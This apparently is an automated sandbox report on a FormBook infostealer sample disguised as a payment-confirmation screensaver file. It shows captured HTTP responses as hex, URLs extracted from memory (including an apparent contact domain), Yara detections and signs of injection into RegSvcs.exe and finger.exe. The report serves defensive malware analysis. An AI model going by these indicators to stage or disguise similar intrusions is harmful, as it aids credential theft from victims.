Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:15 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: W/"1f2b-59f878ddd2a87"Content-Encoding: gzipData Raw: 31 33 39 38 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 59 d9 af e3 d6 79 7f ae 01 ff 0f ea 35 0a 2f f2 1d 2e 12 b5 4c 66 a6 e5 26 8a 12 49 89 8b 16 12 05 02 8a a4 b8 2f a2 48 91 54 d1 3f 66 62 29 48 1b 23 31 92 34 b1 1b 07 2e 92 a0 75 9d c4 49 5a 38 28 52 20 41 db 97 da 49 5f 62 14 e8 63 0f 75 a5 7b c7 e3 31 ec e8 42 10 79 ce 77 be e5 f7 ad 97 7c f0 a7 d4 84 54 d4 29 dd 70 b2 30 78 f4 fc 73 0f ea df 46 a0 47 f6 c3 2b 4f bf 3a ad 58 ba 59 ff 86 56 a6 37 0c 47 4f b7 56 f6 f0 8a 9e 91 d7 a3 e9 55 03 aa b7 32 37 0b ac 47 6d b8 dd 18 b8 81 d5 10 e2 ac 31 88 f3 c8 7c 00 dd ec 5c 4e 47 7a 68 3d bc da b9 56 91 c4 69 76 d5 30 e2 28 b3 22 c0 ad 70 cd cc 79 68 5a 3b d7 b0 ae 4f 37 af ba 91 9b b9 7a 70 bd 35 f4 c0 7a 88 dc 83 5f 0d c1 52 98 87 77 2b 27 f5 b6 59 05 44 66 55 02 38 67 56 99 41 c6 76 5b 6f bc d2 f8 ab e7 9f 6b 80 4f a8 a7 b6 1b dd 6f c0 5f ba b9 4f 74 d3 74 23 fb 66 e1 af 9f 7f ce 0d ed 0b e9 2a 4e 4d 2b bd dd c9 83 cb c6 f9 cc 75 60 ad b3 fb 0d d4 0a 01 2f 70 f4 04 d6 59 4c bc b3 d2 75 10 17 d7 d5 fd c6 d6 48 e3 20 b8 a1 59 c5 66 75 61 b3 06 f6 5e af f5 d0 0d 00 d1 d5 f1 3f 8e 87 e3 47 c7 bf bd 7a b5 c1 5b 6e 5a c5 af 36 ae 5e fb d9 6b ff da 78 ed 17 c7 ef 1c bf 77 fc d1 f1 9b 60 eb 8a 97 1b 53 26 ce 1c d7 a8 ef 8e ff 72 fc f0 f8 8d e3 fb df fe e5 f1 3b 8d 69 1a 37 16 ad 7a 79 e8 a6 3a b0 32 6e 8c 75 3f 6f dc 90 d7 db 60 6f ab 47 db eb ad 95 ba eb 33 00 4f 03 12 b8 91 75 ed 58 ae ed 00 db 90 7b ed 33 d9 49 d9 ad bb b7 ee 37 ba d8 9f 9d 17 6b 84 af f5 c0 b5 01 a0 06 70 9d 95 9e 37 8c 38 88 01 72 a9 bd 7a 09 c5 b0 57 1b 48 bb f5 6a a3 d7 7a 19 6c d7 40 21 9f 80 e0 86 6b bb 9d 94 4f ca 2a ce 2a ac e2 c0 7c 72 fd 02 d8 d0 0a 76 56 e6 1a fa 33 6c 7a a6 5e b5 60 f4 22 f8 99 14 75 7c 9c ec fc 2c d9 37 9a 22 bd 93 a6 80 5f f2 c5 d8 9d 8f dd 19 f8 34 e6 4f 07 e1 3d ab 4c 02 dd 8d 2e ec 9f f2 09 76 c6 e3 c2 a6 05 27 65 43 cf b3 f8 bc 7e 46 ff 05 74 5d ff 81 45 a0 ea 0b 86 9e 6f ad 0b c3 27 cd af a3 f8 13 34 81 7b 21 fb 14 a3 5b 84 3e c3 a4 eb 55 9c 65 71 08 72 e6 1e 76 49 8b b3 e4 c0 bd 1f e8 db ec da 70 dc c0 bc 08 b8 b1 e0 ee d4 8d 1e 4e eb b2 1f 58 19 08 aa eb 6d a2 1b a7 24 45 3e 37 46 56 ba e1 db 69 5d 6e ee 37 5e 58 af ad 95 85 9c 51 b9 05 19 bb b8 ef 85 c2 71 33 eb cb ab b8 bc c8 bb 20 8a 00 9a 13 a2 b7 75 e2 8e ef f5 19 95 d3 e1 33 70 2b fd 0e db 3b ca fb 8d 27 68 ee ad e3 18 d8 f2 e5 ac cc 3e 25 0d f8 ef 93 4a de 22 52 bb f6 bc f5 b9 ce 40 6f ed 4a d2 eb 22 d5 6f a3 f3 62 15 7c 63 52 e7 86 27 08 8a e7 9f 83 5e 69 3c 7c c6 a7 de 6a 34 8e 6f 1d 7f f3 f8 ed e3 bb c7 0f 8e 7f 73 fc b8 5e 7b 06 69 bd d4 78 05 7a fe b9 bf 08 2d d3 d5 1b 71 14 54 75 c9 b3 ac a8 a1 47 66 e3 25 50 a8 6f 8a 38 88 8a 97 cf 4b 7a 79 59 ea 76 ba 49 f9 72 8d c8 0b 4f 82 78 eb ac 53 6c 23 75 80 63 b7 6a 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 25 Feb 2025 09:10:17 GMTContent-Type: text/htmlContent-Length: 7979Connection: closeVary: Accept-EncodingLast-Modified: Thu, 27 Feb 2020 04:57:13 GMTETag: "1f2b-59f878ddd2a87"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2a 20 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 69 6d 67 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0d 0a 7d 0d 0a 75 6c 20 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0d 0a 7d 0d 0a 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0d 0a 7d 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 31 34 33 2c 20 38 33 29 3b 0d 0a 7d 0d 0a 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 34 70 78 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 7d 0d 0a 68 32 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 7d 0d 0a 70 20 7b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 7d 0d 0a 2e 65 78 70 6c 61 69 6e 20 7b 0d 0a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 25 Feb 2025 09:10:31 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867134338.000000000423C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Payent confirmation copy 00888754087.scr, 00000000.00000002.367300150.0000000002401000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867501837.000000000502E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jingdongpt.shop
Source: m0tdggs3TGEEG.exe, 00000007.00000002.867501837.000000000502E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jingdongpt.shop/j64s/
Source: finger.exe, 00000006.00000002.868129541.0000000061EB9000.00000008.00000001.01000000.0000000C.sdmp, sqlite3.dll.6.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: finger.exe, 00000006.00000002.867321380.0000000002CB6000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000030F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://error.skycloud.tw/system/error?code=400
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: finger.exe, 00000006.00000003.439507427.0000000005D1E000.00000004.00000020.00020000.00000000.sdmp, 4ub-1K1Qxn.6.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Payent confirmation copy 00888754087.scr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: 4ub-1K1Qxn.6.dr	String found in binary or memory: https://www.google.com/favicon.ico
Source: finger.exe, 00000006.00000002.867321380.0000000003F8E000.00000004.10000000.00040000.00000000.sdmp, m0tdggs3TGEEG.exe, 00000007.00000002.867134338.00000000043CE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.star.ne.jp/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.388663997.0000000000300000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.453623702.00000000002E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.867501837.0000000004FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866945987.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.388713331.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866925656.00000000001C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.866906811.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.389129040.0000000001720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.867129068.0000000003370000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\Desktop\Payent confirmation copy 00888754087.scr	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\finger.exe	Memory allocated: 770B0000 page execute and read and write	Jump to behavior

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042CE23 NtClose,	3_2_0042CE23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A307AC NtCreateMutant,LdrInitializeThunk,	3_2_00A307AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2F9F0 NtClose,LdrInitializeThunk,	3_2_00A2F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FAE8 NtQueryInformationProcess,LdrInitializeThunk,	3_2_00A2FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00A2FB68 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00A2FB68
